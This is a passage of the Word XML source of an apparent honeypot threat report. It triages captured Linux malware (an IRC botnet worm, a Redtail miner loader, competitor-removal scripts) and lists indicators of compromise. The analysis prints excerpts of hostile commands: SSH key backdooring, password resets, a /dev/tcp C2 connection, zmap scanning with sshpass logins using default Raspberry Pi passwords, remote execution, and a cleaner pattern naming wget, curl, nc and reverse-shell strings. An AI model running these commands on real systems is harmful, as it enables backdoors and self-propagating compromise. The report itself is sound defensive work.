            <w:tcW w:type="dxa" w:w="5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a7a87fbe86774c2e40cc4a7ea2ab1b3c</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1,650</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16443846184eafde36765c9bab2f4397</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1,174</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="56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fda360b1b4f4d3455cb75c6e7edb1d11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="37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1,085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2ec37a7cc8daf20b10e1ad6221061ca5</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759</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6. Malware Triage</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Twenty-one samples were retrieved from the sensor: ten ELF binaries and a set of shell-script loaders. Multi-engine detection rates ranged from moderate to high, and static review of the shell payloads allowed confident family attribution. Three distinct behaviours emerged.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6.1 Sample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500"/>
        <w:gridCol w:w="3160"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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Sample (name / type)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="17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Detections</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="15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Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="31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Family / 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discord-exploit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 / 74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ELF</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RAT / token stealer</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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b9e6… .elf</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="17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40 / 74</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="15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ELF</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Likely DDoS bot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0c88… (loader)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39 / 75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Shell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IRC botnet worm</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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36.sh</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="17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39 / 75</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="15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Shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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IRC botnet worm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048e… .elf</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36 / 74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ELF</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Bot / miner</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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47b2… sshd</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="17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36 / 75</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="15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ELF</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Bot / miner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fcbc…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37 / 75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ELF</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Bot / miner</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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setup.sh</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="17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27 / 74</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="15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Shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="31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Redtail cryptominer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clean_sh / 796c…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21 / 73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Shell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Competitor-removal cleaner</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6.2 Family A — IRC Botnet Worm (Linux.MulDrop-class)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Detection: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">39/75   |   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Type: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Bash loader + self-propagating worm   |   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Samples: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">36.sh and an identical SCP-delivered variant</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This is the most complete payload captured. It is simultaneously a backdoor installer, an IRC-controlled bot, and an internet worm. Its behaviour breaks down as follows.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Privilege handling &amp; persistence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">If not already root, the script copies itself to /opt under a random name and writes an /etc/rc.local entry so it re-launches on every boot, then reboots to gain persistence. Once privileged, it installs an attacker-controlled SSH public key into /root/.ssh/authorized_keys — a durable backdoor that survives password changes — and resets the pi user's password to a value the operator controls.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="DDDDDD" w:sz="4" w:space="6"/>
          <w:left w:val="single" w:color="2E5C8A" w:sz="12" w:space="8"/>
          <w:bottom w:val="single" w:color="DDDDDD" w:sz="4" w:space="6"/>
          <w:right w:val="single" w:color="DDDDDD" w:sz="4" w:space="6"/>
        </w:pBdr>
        <w:shd w:fill="F4F4F4" w:val="clear"/>
        <w:spacing w:after="120" w:before="80" w:line="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">echo "ssh-rsa AAAAB3NzaC1yc2EA...XB6B" &gt;&gt; /root/.ssh/authorized_keys</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">usermod -p \$6\$vGkGPKUr\$heqv...DeR1 pi</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Rival eviction</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Before establishing itself the worm kills a long list of competing miners and bots (minerd, kaiten, the ktx-* architecture family, node, perl) and blackholes a rival's download domain via /etc/hosts. Competition for the host is built directly into the malware.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Command &amp; control</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">It then launches an embedded IRC bot. The bot derives a nickname from an MD5 of uname -a, connects to Undernet servers on port 6667, and joins channel #biret. Commands arrive as IRC private messages that are base64-encoded and RSA-signed; the bot verifies each command against a bundled public key before executing it and returns base64-encoded output. The signature check ensures only the genuine operator can issue commands even if the channel is observed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="DDDDDD" w:sz="4" w:space="6"/>
          <w:left w:val="single" w:color="2E5C8A" w:sz="12" w:space="8"/>
          <w:bottom w:val="single" w:color="DDDDDD" w:sz="4" w:space="6"/>
          <w:right w:val="single" w:color="DDDDDD" w:sz="4" w:space="6"/>
        </w:pBdr>
        <w:shd w:fill="F4F4F4" w:val="clear"/>
        <w:spacing w:after="120" w:before="80" w:line="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">arr[0]="ix1.undernet.org" ... arr[3]="Bucharest.RO.EU.Undernet.Org"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">exec 3&lt;&gt;/dev/tcp/$svr/6667</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">JOIN #biret</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># PRIVMSG payload: base64 + RSA-signed, verified against /tmp/public.pem</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Worm propagation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Finally it self-replicates. It installs zmap and sshpass, scans the internet for open port 22 in 100,000-host batches, and attempts to log into every result as pi using the default Raspberry Pi passwords raspberry and raspberryraspberry993311. On success it copies itself over SCP and executes remotely — closing the loop and spreading autonomously to the next victim.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="DDDDDD" w:sz="4" w:space="6"/>
          <w:left w:val="single" w:color="2E5C8A" w:sz="12" w:space="8"/>
          <w:bottom w:val="single" w:color="DDDDDD" w:sz="4" w:space="6"/>
          <w:right w:val="single" w:color="DDDDDD" w:sz="4" w:space="6"/>
        </w:pBdr>
        <w:shd w:fill="F4F4F4" w:val="clear"/>
        <w:spacing w:after="120" w:before="80" w:line="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">zmap -p 22 -o $FILE -n 100000</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">sshpass -praspberry scp $MYSELF pi@$IP:/tmp/$NAME</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">sshpass -praspberry ssh pi@$IP "cd /tmp &amp;&amp; chmod +x $NAME &amp;&amp; bash ./$NAME"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
        </w:rPr>
        <w:t xml:space="preserve">Assessment. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">A textbook IoT-targeting worm built around the long-standing default-credential weakness of Raspberry Pi devices. The RSA-verified IRC channel is a notably robust C2 design for such a lightweight implant. This family matches malware previously captured by the author on a separate sensor, indicating sustained, ongoing circulation in the wild.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6.3 Family B — Redtail Cryptominer Loader</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Detection: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">27/74   |   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Type: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Architecture-aware miner dropper   |   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Sample: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">setup.sh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A more modern and stealth-conscious loader than Family A. It generates a random hidden filename, detects the CPU architecture and maps it to a target build (x86_64, i686, arm7, arm8), then searches the filesystem for a writable, non-noexec directory with at least 2 MB free — testing each candidate before use to ensure the payload can execute.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="DDDDDD" w:sz="4" w:space="6"/>
          <w:left w:val="single" w:color="2E5C8A" w:sz="12" w:space="8"/>
          <w:bottom w:val="single" w:color="DDDDDD" w:sz="4" w:space="6"/>
          <w:right w:val="single" w:color="DDDDDD" w:sz="4" w:space="6"/>
        </w:pBdr>
        <w:shd w:fill="F4F4F4" w:val="clear"/>
        <w:spacing w:after="120" w:before="80" w:line="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">ARCH=$(uname -mp)   # mapped to x86_64 / i686 / arm7 / arm8</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">FOLDERS=$(find / -type d -user $(whoami) -perm -u=rwx ...)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">cat redtail.$ARCH &gt; .$FILENAME &amp;&amp; chmod +x .$FILENAME &amp;&amp; ./.$FILENAME ssh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">It deploys the matching redtail.&lt;arch&gt; binary, launches it with an ssh propagation argument, and deletes the staging files to minimise forensic residue. Redtail is a known cryptomining family active through 2024-2025 that specifically targets cloud servers for their CPU resources.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
        </w:rPr>
        <w:t xml:space="preserve">Assessment. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Resource-theft malware. The architecture-matching logic and noexec-aware directory hunting show a deliberately portable, evasion-aware design intended to monetise compromised compute via cryptomining.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6.4 Family C — Competitor-Removal “Cleaner” Scripts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Detection: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">21/73   |   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Type: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Anti-rival cleanup   |   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Samples: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">clean_sh and a near-identical variant</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">These scripts do not attack the host directly — they attack other malware on it. The presence of this category is itself the most telling finding of the engagement: it proves multiple actors were fighting over the same machine.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The cleaner explicitly disables and stops the c3pool_miner service (a competitor), then strips any crontab entry containing tell-tale strings such as wget, curl, /dev/tcp, /tmp, .sh and base64 -d to remove rivals' persistence. It wipes the common staging directories /tmp, /var/tmp and /dev/shm, neutralises masquerading binaries (a fake systemtd, a disguised -bash, a hidden /usr/bin/.sh), and kills their processes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="DDDDDD" w:sz="4" w:space="6"/>
          <w:left w:val="single" w:color="2E5C8A" w:sz="12" w:space="8"/>
          <w:bottom w:val="single" w:color="DDDDDD" w:sz="4" w:space="6"/>
          <w:right w:val="single" w:color="DDDDDD" w:sz="4" w:space="6"/>
        </w:pBdr>
        <w:shd w:fill="F4F4F4" w:val="clear"/>
        <w:spacing w:after="120" w:before="80" w:line="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">systemctl disable c3pool_miner ; systemctl stop c3pool_miner</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">grep -vE 'wget|curl|/dev/tcp|/tmp|\.sh|nc|bash -i|sh -i|base64 -d' "$cron" | crontab -</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">pkill -9 systemtd ; pkill -9 -f "/bin/-bash"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
        </w:rPr>
        <w:t xml:space="preserve">Assessment. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Territorial malware. Modern commodity threats assume a host is already contested and ship with routines to evict competitors and monopolise resources — a behaviour pattern every defender analysing a compromised Linux box should expect to encounter.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6.5 ELF Binaries &amp; discord-exploit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The ten ELF samples could not be statically read like the shell loaders but carried moderate-to-high detection rates. The standout, discord-exploit (45/74 — the highest in the set), is an ELF masquerading under a gaming-related name, consistent with a remote-access trojan or credential/token stealer aimed at compromising Discord accounts from infected hosts. The remaining unnamed binaries, given their delivery alongside the loaders above and their detection profiles, are most consistent with DDoS bots and additional cryptominer payloads. Full reverse-engineering of these binaries is recommended as follow-on work.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7. Indicators of Compromise (IOCs)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The following indicators are provided for detection and blocking. Hashes are SHA-256. This list is TLP:CLEAR and safe to share.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7.1 Network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Indicator</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="59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Context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176.65.132.0/24 (.17/.22/.24/.129)</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High-volume brute-force cluster</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45.156.87.0/24 (.204/.253/.254)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5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Brute-force cluster</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45.153.34.0/24 (.112/.186)</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Brute-force cluster</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179.43.133.154</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5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Sustained credential attack</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91.92.40.10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Advanced hardware-profiling actor</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="34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irc :6667  #biret  (Undernet)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="59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Botnet C2 channel</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bins.deutschland-zahlung.eu</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Rival domain blackholed by worm</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7.2 Host Indicators</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Unexpected SSH key in /root/.ssh/authorized_keys (worm backdoor).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">/etc/rc.local entry pointing to a random binary under /opt (persistence).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Hidden executables in /tmp, /var/tmp or /dev/shm; processes named systemtd, -bash, or /usr/bin/.sh.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Presence of zmap and sshpass on hosts that should not have them (worm scanning tools).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Outbound connections to TCP 6667 (IRC C2).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7.3 File Hashes (selected,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SHA-256</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="25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vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Family</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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6d1fe6ab3cd04ca5d1ab790339ee2b6577553bc042af3b7587ece0c195267c9b</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IRC worm</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="68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0c889251c703623c3397893515aae9624f45c609fcf5881ace4b2e0a1857a88f</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="25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IRC worm</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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783adb7ad6b16fe9818f3e6d48b937c3ca1994ef24e50865282eeedeab7e0d59</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Redtail</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="68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197c74408e15bd1168105f564f96aace4fd4819961b724630bf5a6be4878daf8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="25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Cleaner</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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796c061818a54d7013e29861603dec0054218c29a30007d2d35d3e983a567d16</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Cleaner</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="68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94f2e4d8d4436874785cd14e6e6d403507b8750852f7f2040352069a75da4c00</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="25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discord-exploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
